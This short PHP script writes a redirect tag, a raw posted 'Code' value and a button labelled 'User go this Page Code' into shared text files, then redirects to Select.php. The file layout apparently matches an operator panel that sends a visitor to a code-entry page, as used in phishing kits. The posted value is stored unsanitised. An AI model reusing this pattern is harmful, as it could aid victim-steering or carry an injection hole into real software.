<?php


session_start();

if(isset($_POST['Code'])) 
{
    
$Page .= '<meta http-equiv="refresh" content="0;url=./Code.php" />  ';

$fPage = fopen("../Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


$Pageee .= ''.$_POST['Code'].'';

$fPageee = fopen("../Show_system/Show_Code.txt", "w");
    fwrite($fPageee, $Pageee);



$Pag .= '<div class="expanded button-group"><input type="submit" value="✅ User go this Page Code 💯" class="button" style="
    background: #8bc34a;
"></div>';

$fPag = fopen("../Show_system/Show_Select.txt", "w");
    fwrite($fPag, $Pag);


header("location:../Select.php");

}

else {




}

?>